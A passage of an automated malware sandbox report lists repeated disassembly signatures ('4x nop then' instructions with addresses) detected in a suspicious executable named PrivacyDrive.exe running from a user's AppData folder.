    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov eax, dword ptr [ebp-34h] | 4_2_00FA5D92
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h | 4_2_00FCBD62
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov eax, dword ptr [esi+04h] | 4_2_00FC0EF0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov eax, ebp | 4_2_00F8BEE2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov eax, ebp | 4_2_00F8BEE2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov eax, dword ptr [esi+20h] | 4_2_00FB3ED2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah | 4_2_00FCBED2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov edi, dword ptr [ebp-3Ch] | 4_2_00FAFEC1
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov byte ptr [edi], al | 4_2_00FB4E2D
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov eax, dword ptr [esp] | 4_2_00FC4E22
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov byte ptr [edi], al | 4_2_00FB4E18
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov eax, dword ptr [ebp-14h] | 4_2_00FB0E11
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov eax, dword ptr [esp] | 4_2_00FCBFE2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov eax, dword ptr [esi+20h] | 4_2_00FB3EB7
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov eax, dword ptr [esi+20h] | 4_2_00FB3F33
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then movzx edx, byte ptr [ecx+eax] | 4_2_051AF7B0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h | 4_2_051EA1E0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov eax, dword ptr [esi+20h] | 4_2_051D2531
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov eax, dword ptr [esi+20h] | 4_2_051D24B5
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov eax, dword ptr [esp] | 4_2_051EA5E0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov byte ptr [edi], al | 4_2_051D3419
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov eax, dword ptr [ebp-14h] | 4_2_051CF40F
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov byte ptr [edi], al | 4_2_051D342B
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov eax, dword ptr [esp] | 4_2_051E3420
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov eax, dword ptr [esi+20h] | 4_2_051D24D0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah | 4_2_051EA4D0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov edi, dword ptr [ebp-3Ch] | 4_2_051CE4C2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov eax, dword ptr [esi+04h] | 4_2_051DF4EE
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov eax, ebp | 4_2_051AA4E0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov eax, ebp | 4_2_051AA4E0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov eax, dword ptr [ebp-18h] | 4_2_051CB6CC
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov eax, dword ptr [ebp-54h] | 4_2_051C0730
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov eax, dword ptr [ebp-18h] | 4_2_051CB732
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov eax, dword ptr [esp+04h] | 4_2_051B4611
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov eax, dword ptr [esp+04h] | 4_2_051B460A
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then movzx eax, word ptr [esi+ecx] | 4_2_051E1100
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov byte ptr [edi], al | 4_2_051D314A
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov edi, eax | 4_2_051A7170
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then jmp ecx | 4_2_051DF160
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h | 4_2_051BF193
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exe | Code function: 4x nop then mov word ptr [esi], ax | 4_2_051BF193
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then jmp eax4_2_051B61F2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp byte ptr [edi], 00000000h4_2_051B60F1
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h4_2_051EA360
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-34h]4_2_051C4390
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]4_2_051D03B0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]4_2_051C83A5
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]4_2_051B33DB
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]4_2_051A5D10
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]4_2_051CED6D
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]4_2_051CED6D
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov word ptr [eax], cx4_2_051E9C10
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh4_2_051CBC50
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh4_2_051CBC50
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp]4_2_051C8C90
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]4_2_051A4CB0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h4_2_051BDCC2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]4_2_051B0F0F
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov dword ptr [esp], 00000000h4_2_051BAF50
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]4_2_051B3FA9
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp+28h]4_2_051B3FA9
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then push ebx4_2_051BDE33
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp]4_2_051E7E30
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 54CA534Eh4_2_051E7E30
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov edi, ecx4_2_051B3EA6
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h4_2_051C6910
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]4_2_051B399C
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh4_2_051E49F0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [ebx], al4_2_051D2813
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [ebx], al4_2_051D2813
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh4_2_051E3870
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [ebx], al4_2_051D2899
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [ebx], al4_2_051D2899
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then movzx ebx, byte ptr [edx]4_2_051DA880
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]8_2_00F86013
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]8_2_00F8600C
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then movzx edx, byte ptr [ecx+eax]8_2_00F811B2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-18h]8_2_00F9D0CE
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-54h]8_2_00F92132
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-18h]8_2_00F9D134
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp]8_2_00FB12FC
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 77A9E0C4h8_2_00FB12FC
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp]8_2_00FBC2B2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [ebx], al8_2_00FA429B
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [ebx], al8_2_00FA429B
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then movzx ebx, byte ptr [edx]8_2_00FAC282
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh8_2_00FB5272
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [ebx], al8_2_00FA4215
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [ebx], al8_2_00FA4215
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh8_2_00FB63F2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]8_2_00F8539E
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h8_2_00F98312
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp byte ptr [edi], 00000000h8_2_00F874E1
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp+10h]8_2_00F7F4B2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, 0000000Bh8_2_00FA54B5
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then movzx ebp, word ptr [edi]8_2_00FB0432
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-54h]8_2_00F92403
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esi+00000744h]8_2_00FA45CB
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [edi], al8_2_00FA45CB
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [ebx], al8_2_00FA45CB
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-54h]8_2_00F925AE
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov word ptr [eax], cx8_2_00F98582
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp]8_2_00F9F577
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h8_2_00F8F6C4
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]8_2_00F766B2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp]8_2_00F9A692
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], CECD21FDh8_2_00F9D652
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], CECD21FDh8_2_00F9D652
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov word ptr [eax], cx8_2_00FBB612
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]8_2_00FA076F
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]8_2_00FA076F
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]8_2_00F77712
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov edi, ecx8_2_00F858A8
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp]8_2_00FB9832
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 54CA534Eh8_2_00FB9832
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then push ebx8_2_00F8F835
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]8_2_00F859AB
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp+28h]8_2_00F859AB
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov dword ptr [esp], 00000000h8_2_00F8C952
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]8_2_00F82911
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp byte ptr [edi], 00000000h8_2_00F87AF3
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then jmp eax8_2_00F87BF4
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h8_2_00FBBBE2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h8_2_00F90B95
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov word ptr [esi], ax8_2_00F90B95
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov edi, eax8_2_00F78B72
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then jmp ecx8_2_00FB0B62
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [edi], al8_2_00FA4B4C
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then movzx eax, word ptr [esi+ecx]8_2_00FB2B02
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]8_2_00F84DDD
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]8_2_00FA1DB2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]8_2_00F99DA7
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-34h]8_2_00F95D92
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h8_2_00FBBD62
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]8_2_00FB0EF0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, ebp8_2_00F7BEE2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, ebp8_2_00F7BEE2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]8_2_00FA3ED2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah8_2_00FBBED2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov edi, dword ptr [ebp-3Ch]8_2_00F9FEC1
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [edi], al8_2_00FA4E2D
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp]8_2_00FB4E22
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [edi], al8_2_00FA4E18
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]8_2_00FA0E11
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp]8_2_00FBBFE2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]8_2_00FA3EB7
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]8_2_00FA3F33
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h8_2_0121A1E0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then movzx edx, byte ptr [ecx+eax]8_2_011DF7B0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then movzx eax, word ptr [esi+ecx]8_2_01211100
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then jmp ecx8_2_0120F160
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [edi], al8_2_0120314A
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov edi, eax8_2_011D7170
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h8_2_011EF193
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov word ptr [esi], ax8_2_011EF193
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then jmp eax8_2_011E61F2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp byte ptr [edi], 00000000h8_2_011E60F1
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 7E28BDA7h8_2_0121A360
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-34h]8_2_011F4390
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]8_2_012003B0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-10h]8_2_011F83A5
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp+08h]8_2_011E33DB
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]8_2_01202531
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]8_2_012024B5
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp]8_2_0121A5E0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp]8_2_01213420
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [edi], al8_2_0120342B
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-14h]8_2_011FF40F
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [edi], al8_2_01203419
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esi+04h]8_2_0120F4EE
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov edi, dword ptr [ebp-3Ch]8_2_011FE4C2
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esi+20h]8_2_012024D0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [ebp+edx*8+00h], 81105F7Ah8_2_0121A4D0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, ebp8_2_011DA4E0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, ebp8_2_011DA4E0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-18h]8_2_011FB6CC
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-18h]8_2_011FB732
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [ebp-54h]8_2_011F0730
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]8_2_011E4611
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]8_2_011E460A
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h8_2_011F6910
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp+04h]8_2_011E399C
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 0633C81Dh8_2_012149F0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [ebx], al8_2_01202813
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [ebx], al8_2_01202813
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 1B788DCFh8_2_01213870
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp]8_2_0121A8B0
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then movzx ebx, byte ptr [edx]8_2_0120A880
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [ebx], al8_2_01202899
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov byte ptr [ebx], al8_2_01202899
    Source: C:\Users\user\AppData\Roaming\OIlqJYuE\PrivacyDrive.exeCode function: 4x nop then mov eax, dword ptr [esp]8_2_0120F8FA
